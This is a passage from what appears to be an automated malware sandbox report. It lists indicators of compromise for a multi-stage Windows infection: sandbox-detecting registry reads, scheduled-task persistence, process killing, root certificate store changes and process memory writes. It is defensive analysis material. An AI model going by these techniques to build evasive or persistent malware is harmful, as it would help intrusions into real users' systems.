cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f00980bbe6.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language jROrnzx.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 7aencsM.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 9ed9551403.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ffa7544a13.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 9ed9551403.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 7aencsM.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString ffa7544a13.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 2040 timeout.exe 3928 timeout.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Kills process with taskkill 10 IoCs
pid Process 872 taskkill.exe 1720 taskkill.exe 1308 taskkill.exe 2760 taskkill.exe 2688 taskkill.exe 3056 taskkill.exe 2956 taskkill.exe 2792 taskkill.exe 2336 taskkill.exe 3480 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings firefox.exe Key created \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000_Classes\Local Settings firefox.exe -
Modifies system certificate store 2 TTPs 7 IoCs
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a f6ed024c22.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Bjkm5hE.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Bjkm5hE.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 040000000100000010000000497904b0eb8719ac47b0bc11519b74d0030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Bjkm5hE.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa20f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349040000000100000010000000497904b0eb8719ac47b0bc11519b74d0200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Bjkm5hE.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25 f6ed024c22.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a f6ed024c22.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2948 schtasks.exe 1060 schtasks.exe 1408 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 2848 skotes.exe 600 powershell.exe 600 powershell.exe 600 powershell.exe 408 TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE 2080 powershell.exe 1728 powershell.exe 2452 powershell.exe 408 TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE 408 TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE 2840 powershell.exe 2840 powershell.exe 2840 powershell.exe 1416 483d2fa8a0d53818306efeb32d3.exe 3060 powershell.exe 2660 Bjkm5hE.exe 2660 Bjkm5hE.exe 2660 Bjkm5hE.exe 2660 Bjkm5hE.exe 288 f97a89268c.exe 2648 Ta3ZyUR.exe 2648 Ta3ZyUR.exe 2648 Ta3ZyUR.exe 2648 Ta3ZyUR.exe 3564 a9b80795c6.exe 3564 a9b80795c6.exe 288 f97a89268c.exe 288 f97a89268c.exe 2636 7aencsM.exe 2636 7aencsM.exe 2636 7aencsM.exe 2636 7aencsM.exe 3820 DTQCxXZ.exe 3820 DTQCxXZ.exe 3820 DTQCxXZ.exe 3820 DTQCxXZ.exe 3492 chrome.exe 3492 chrome.exe 2636 7aencsM.exe 2636 7aencsM.exe 2636 7aencsM.exe 2636 7aencsM.exe 2636 7aencsM.exe 2636 7aencsM.exe 2336 d2YQIJa.exe 2336 d2YQIJa.exe 2336 d2YQIJa.exe 2336 d2YQIJa.exe 2336 d2YQIJa.exe 2336 d2YQIJa.exe 3080 jROrnzx.exe 3080 jROrnzx.exe 3080 jROrnzx.exe 3080 jROrnzx.exe 3456 aadc92ce82.exe 4060 8e8b499a39.exe 4060 8e8b499a39.exe 3700 594ce90f45.exe 3700 594ce90f45.exe 3700 594ce90f45.exe 3700 594ce90f45.exe 3700 594ce90f45.exe 3700 594ce90f45.exe -
Suspicious use of AdjustPrivilegeToken 41 IoCs
description pid Process Token: SeDebugPrivilege 600 powershell.exe Token: SeDebugPrivilege 2080 powershell.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 2452 powershell.exe Token: SeDebugPrivilege 408 TempUOZSAS9IBE8Q7DFBQAU1DGBYTVYDMIQI.EXE Token: SeDebugPrivilege 2840 powershell.exe Token: SeDebugPrivilege 3060 powershell.exe Token: SeDebugPrivilege 2760 taskkill.exe Token: SeDebugPrivilege 2792 taskkill.exe Token: SeDebugPrivilege 2688 taskkill.exe Token: SeDebugPrivilege 3056 taskkill.exe Token: SeDebugPrivilege 2956 taskkill.exe Token: SeDebugPrivilege 1940 firefox.exe Token: SeDebugPrivilege 1940 firefox.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeShutdownPrivilege 3492 chrome.exe Token: SeDebugPrivilege 3292 a6c78ad37e.exe Token: SeDebugPrivilege 872 taskkill.exe Token: SeShutdownPrivilege 4084 chrome.exe Token: SeShutdownPrivilege 4084 chrome.exe Token: SeShutdownPrivilege 4084 chrome.exe Token: SeShutdownPrivilege 4084 chrome.exe Token: SeDebugPrivilege 2336 taskkill.exe Token: SeShutdownPrivilege 4084 chrome.exe Token: SeShutdownPrivilege 4084 chrome.exe Token: SeDebugPrivilege 3480 taskkill.exe Token: SeDebugPrivilege 3544 powershell.exe Token: SeDebugPrivilege 1720 taskkill.exe Token: SeDebugPrivilege 1308 taskkill.exe Token: SeDebugPrivilege 3032 firefox.exe Token: SeDebugPrivilege 3032 firefox.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 680 1c37375b51.exe 680 1c37375b51.exe 680 1c37375b51.exe 2324 amnew.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 1940 firefox.exe 1940 firefox.exe 1940 firefox.exe 1940 firefox.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3492 chrome.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 4084 chrome.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3852 484976ff5a.exe 3852 484976ff5a.exe 3852 484976ff5a.exe 3848 5daa0a45e0.exe -
Suspicious use of SendNotifyMessage 34 IoCs
pid Process 680 1c37375b51.exe 680 1c37375b51.exe 680 1c37375b51.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 1940 firefox.exe 1940 firefox.exe 1940 firefox.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 288 f97a89268c.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3852 484976ff5a.exe 3852 484976ff5a.exe 3852 484976ff5a.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3032 firefox.exe 3032 firefox.exe 3032 firefox.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe 3848 5daa0a45e0.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2792 wrote to memory of 2848 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 31 PID 2792 wrote to memory of 2848 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 31 PID 2792 wrote to memory of 2848 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 31 PID 2792 wrote to memory of 2848 2792 dfb3dd74837e1f931c4456bd18eb5a8d.exe 31 PID 2848 wrote to memory of 680 2848 skotes.exe 33 PID 2848 wrote to memory of 680 2848 skotes.exe 33 PID 2848 wrote to memory of 680 2848 skotes.exe 33 PID 2848 wrote to memory of 680 2848 skotes.exe 33 PID 680 wrote to memory of 1416 680 1c37375b51.exe 34 PID 680 wrote to memory of 1416 680 1c37375b51.exe 34 PID 680 wrote to memory of 1416 680 1c37375b51.exe 34 PID 680 wrote to memory of 1416 680 1c37375b51.exe 34 PID 680 wrote to memory of 3000 680 1c37375b51.exe 35 PID 680 wrote to memory of 3000 680 1c37375b51.exe 35 PID 680 wrote to memory of 3000 680 1c37375b51.exe 35 PID 680 wrote to memory of 3000 680 1c37375b51.exe 35 PID 1416 wrote to memory of 2948 1416 cmd.exe 37 PID 1416 wrote to memory of 2948 1416 cmd.exe 37 PID 1416 wrote to memory of 2948 1416 cmd.exe 37 PID 1416 wrote to memory of 2948 1416 cmd.exe 37 PID 3000 wrote to memory of 600 3000 mshta.exe 38 PID 3000 wrote to memory of 600 3000 mshta.exe 38 PID 3000 wrote to memory of 600 3000 mshta.exe 38 PID 3000 wrote to memory of 600 3000 mshta.exe 38 PID 2848 wrote to memory of 2232 2848 skotes.exe 40 PID 2848 wrote to memory of 2232 2848 skotes.exe 40 PID 2848 wrote to memory of 2232 2848 skotes.exe 40 PID 2848 wrote to memory of 2232 2848 skotes.exe 40 PID 2232 wrote to memory of 2352 2232 cmd.exe 42 PID 2232 wrote to memory of 2352 2232 cmd.exe 42 PID 2232 wrote to memory of 2352 2232 cmd.exe 42 PID 2232 wrote to memory of 2352 2232 cmd.exe 42 PID 2352 wrote to memory of 2040 2352 cmd.exe 44 PID 2352 wrote to memory of 2040 2352 cmd.exe 44 PID 2352 wrote to memory of 2040 2352 cmd.exe 44 PID 2352 wrote to memory of 2040 2352 cmd.exe 44 PID 600 wrote to memory of 408 600 powershell.exe 45 PID 600 wrote to memory of 408 600 powershell.exe 45 PID 600 wrote to memory of 408 600 powershell.exe 45 PID 600 wrote to memory of 408 600 powershell.exe 45 PID 2352 wrote to memory of 1360 2352 cmd.exe 46 PID 2352 wrote to memory of 1360 2352 cmd.exe 46 PID 2352 wrote to memory of 1360 2352 cmd.exe 46 PID 2352 wrote to memory of 1360 2352 cmd.exe 46 PID 1360 wrote to memory of 2080 1360 cmd.exe 47 PID 1360 wrote to memory of 2080 1360 cmd.exe 47 PID 1360 wrote to memory of 2080 1360 cmd.exe 47 PID 1360 wrote to memory of 2080 1360 cmd.exe 47 PID 2352 wrote to memory of 2328 2352 cmd.exe 48 PID 2352 wrote to memory of 2328 2352 cmd.exe 48 PID 2352 